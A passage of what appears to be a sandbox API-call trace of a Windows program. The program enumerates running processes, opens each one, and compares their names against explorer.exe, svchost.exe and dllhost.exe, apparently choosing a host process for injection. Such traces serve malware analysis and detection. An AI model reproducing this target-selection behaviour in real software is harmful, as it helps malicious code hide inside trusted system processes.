(in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0193.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0193.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0193.391] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0193.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0193.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0193.392] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0193.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0193.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0193.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0193.393] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0193.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0193.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0193.394] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0193.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0193.395] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0193.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0193.396] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0193.397] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0193.397] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0193.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0193.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0193.398] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.398] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.398] CloseHandle (hObject=0xec) returned 1 [0193.398] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0193.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0193.399] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0193.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0193.399] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.399] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.400] CloseHandle (hObject=0xec) returned 1 [0193.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0193.400] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0193.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0193.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0193.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0193.401] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.401] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.401] CloseHandle (hObject=0xec) returned 1 [0193.401] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0193.401] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0193.401] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0193.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0193.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0193.402] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.402] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.402] CloseHandle (hObject=0xec) returned 1 [0193.402] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0193.402] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0193.402] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0193.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0193.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0193.403] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.403] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.403] CloseHandle (hObject=0xec) returned 1 [0193.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0193.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0193.403] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0193.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0193.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0193.403] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.403] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.403] CloseHandle (hObject=0xec) returned 1 [0193.403] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0193.403] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0193.403] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0193.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0193.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0193.404] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.404] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.404] CloseHandle (hObject=0xec) returned 1 [0193.404] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0193.404] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0193.404] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0193.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0193.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0193.405] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.405] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.405] CloseHandle (hObject=0xec) returned 1 [0193.405] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0193.405] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0193.405] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0193.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0193.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0193.405] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.405] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.405] CloseHandle (hObject=0xec) returned 1 [0193.405] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0193.405] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0193.405] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0193.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0193.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0193.406] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.406] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.406] CloseHandle (hObject=0xec) returned 1 [0193.406] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0193.406] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0193.406] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0193.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0193.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0193.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.407] CloseHandle (hObject=0xec) returned 1 [0193.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0193.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0193.407] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0193.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0193.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0193.407] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.407] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.407] CloseHandle (hObject=0xec) returned 1 [0193.407] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0193.408] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0193.408] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0193.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0193.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0193.408] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.408] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.408] CloseHandle (hObject=0xec) returned 1 [0193.408] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0193.408] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0193.408] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0193.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0193.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0193.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.409] CloseHandle (hObject=0xec) returned 1 [0193.409] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0193.409] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0193.409] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0193.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0193.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0193.409] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.409] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.410] CloseHandle (hObject=0xec) returned 1 [0193.410] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0193.410] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0193.410] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0193.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0193.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0193.410] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.410] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.410] CloseHandle (hObject=0xec) returned 1 [0193.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0193.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0193.410] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0193.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0193.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0193.411] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.411] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.411] CloseHandle (hObject=0xec) returned 1 [0193.411] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0193.411] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0193.411] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0193.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0193.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0193.412] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.412] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.412] CloseHandle (hObject=0xec) returned 1 [0193.412] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0193.412] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0193.412] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0193.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0193.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0193.412] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.412] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.412] CloseHandle (hObject=0xec) returned 1 [0193.412] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0193.412] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0193.412] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0193.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0193.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0193.413] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.413] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.413] CloseHandle (hObject=0xec) returned 1 [0193.413] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0193.413] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0193.413] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0193.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0193.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0193.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0193.414] CloseHandle (hObject=0xec) returned 1 [0193.414] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0193.414] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0193.414] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0193.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 